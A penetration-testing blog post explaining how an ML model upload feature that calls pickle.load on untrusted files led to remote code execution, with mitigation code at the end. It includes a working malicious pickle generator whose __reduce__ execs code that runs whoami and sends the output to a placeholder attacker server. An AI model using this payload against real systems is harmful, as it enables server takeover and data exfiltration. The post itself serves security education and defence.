A Security Pickle with Pickle - How We Turned Machine Learning into RCE

- idan ba

- Aug 17, 2025

Intro

In this post, I want to share an interesting vulnerability we discovered during a penetration test of a client's web application.

It all started with a web application that allowed administrators to upload machine learning models in .pkl format. Sounds harmless enough, right? Just drop in your serialized Python model and let the app analyze it.



The catch? Those files were being handled by Python’s pickle module. And what's wrong with pickle, you may ask? Well, if you visit the pickle documentation page on python.org, you'll quickly see where this is going: the documentation pretty much screams at you that this module is insecure!

Long story short: using pickle on untrusted input is basically asking for trouble. We managed to take that seemingly innocent feature and turn it into a full remote code execution (RCE) on the server. Let’s walk through how.

What is Pickle Anyway?

The pickle module implements binary protocols for serializing and de-serializing a Python object structure. “Pickling” is the process whereby a Python object is converted into a byte stream, and “unpickling” is the inverse operation, whereby a byte stream is converted back into an object.

But here’s the problem: pickle doesn’t just store data. It can also store instructions on how to rebuild objects, and those instructions can tell the unpickler to call arbitrary Python callables with attacker-chosen arguments. This means that if someone gives you a malicious pickle file, deserializing it can run their code on your machine.
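To make the "instructions on how to rebuild objects" idea concrete, here is a minimal, harmless sketch. The class name `Demo` and the choice of `len` as the callable are illustrative assumptions, not part of the tested application; the point is only that whatever callable `__reduce__` names gets called at load time.

```python
import pickle

class Demo:
    # pickle calls __reduce__ while dumping and stores the returned
    # (callable, args) pair in the byte stream.
    def __reduce__(self):
        return (len, ("hello",))

payload = pickle.dumps(Demo())

# On load, the unpickler calls len("hello") and returns its result.
result = pickle.loads(payload)
print(type(result).__name__, result)
```

Note that what comes back is not a `Demo` instance at all but the return value of the stored call. Swap the harmless callable for something like `exec` or `os.system` and the same mechanism becomes code execution.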

Where Things Went Wrong

The target application let administrators upload model files, which were then deserialized and used by the system. Internally, the app was doing something like this:

    pickle.load(file)

No checks. Just straight-up loading whatever was inside the uploaded file.

Exploiting the Pickle

To prove the vulnerability, we built a malicious pickle file that would run the whoami command on the server and send the result back to us. Here’s a simplified version of the exploit code:

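    import pickle

    class Exploit:
        # pickle calls __reduce__ when dumping and stores the returned
        # (callable, args) pair; pickle.load() later calls exec(<code string>).
        def __reduce__(self):
            return (
                exec,
                ("__import__('urllib.request').request.urlopen('http://{yourServer}/?e=' + str(__import__('subprocess').run(['whoami'], capture_output=True, text=True).stdout))",)
            )

    # {yourServer} is a placeholder for the tester's own listener host.
    with open("whoami.pkl", "wb") as f:
        pickle.dump(Exploit(), f)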



Once we uploaded the generated whoami.pkl and triggered the analysis function, the target server executed our payload and we got a nice little GET request on our own server with the output of whoami. Boom - RCE confirmed!

Note that the output of the whoami command is appended to the e parameter, showing us that the service was running with root privileges.

Here’s the quick version of what the exploit does:

- It hides a payload inside a fake “model” object by overriding __reduce__, the method pickle calls while serializing to record how the object should be rebuilt.

- When the server calls pickle.load() on the uploaded whoami.pkl, the unpickler follows that stored recipe and calls exec(...) with our code string. No extra method calls are needed.

- The code it executes does two things:

  - runs whoami on the server (so we know we’re executing OS commands),

  - sends the command’s output to an attacker-controlled URL as a simple HTTP GET.

If you see that GET request hit your server with the username in the query string, you’ve proved remote code execution via insecure deserialization.
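The stored recipe described above can also be seen without running it. The sketch below uses the standard library's `pickletools.genops` to list the opcodes that import a global or call something during loading. The function name `risky_opcodes`, the opcode set, and the harmless `Demo` class are assumptions made for illustration.

```python
import pickle
import pickletools

# Opcodes that make the unpickler import a name or call/instantiate something.
CALL_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                "NEWOBJ", "NEWOBJ_EX", "BUILD"}

def risky_opcodes(data):
    """Return the call-related opcode names found in a pickle, without loading it."""
    return {op.name for op, _arg, _pos in pickletools.genops(data)
            if op.name in CALL_OPCODES}

class Demo:
    # Harmless stand-in for the exploit class: same mechanism, benign callable.
    def __reduce__(self):
        return (len, ("hello",))

print(risky_opcodes(pickle.dumps(Demo())))           # import + call opcodes
print(risky_opcodes(pickle.dumps({"a": [1, 2, 3]})))  # plain data: empty set
```

This is an inspection aid rather than a filter: pickles of legitimate class instances, including real ML models, generally contain the same opcodes, which is part of why scanning alone cannot make untrusted pickles safe.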

Elevating the impact

Although the upload feature was originally intended only for administrators, we quickly discovered that this restriction wasn’t being properly enforced.

By chaining the insecure deserialization issue with a separate authorization flaw, we were able to access the upload endpoint as a regular user. This meant that any authenticated user, not just admins, could upload malicious pickle files and trigger remote code execution on the server.

Wrapping Up the Pickles

This was a fun and interesting real-world example of how a design choice (using pickle for ML models) combined with a separate flaw (authorization bypass) turned into a full server takeover.

The key takeaway is that pickle is not just a serialization library; it’s also a loaded gun if you point it at untrusted files. Developers should take extra care when using serialization libraries and never allow untrusted data to be deserialized.
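If pickle cannot be avoided entirely, one partial mitigation is the allow-list approach described in the "Restricting Globals" section of the Python documentation: subclass `pickle.Unpickler` and override `find_class`. The sketch below follows that pattern. The allow-list contents, the helper name `restricted_loads`, and the harmless `Demo` class are illustrative assumptions, and this was not the fix applied in the engagement.

```python
import builtins
import io
import pickle

# Hypothetical allow-list: only these builtins may be referenced by a pickle.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle asks to import a global.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data):
    """Like pickle.loads(), but refuses any global outside the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

class Demo:
    # Same shape as the exploit, but the code string does nothing.
    def __reduce__(self):
        return (exec, ("pass",))

print(restricted_loads(pickle.dumps({"a": [1, 2, 3]})))  # plain data still loads
try:
    restricted_loads(pickle.dumps(Demo()))
except pickle.UnpicklingError as err:
    print("blocked:", err)
```

An allow-list narrow enough to be safe usually cannot load a real model class, so for model uploads a data-only format is generally the more robust choice. Treat this as damage reduction, not a guarantee.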

Next time you’re dealing with machine learning model uploads (or anything involving serialization), think twice before reaching for pickle. Otherwise, you might just end up in a security pickle of your own.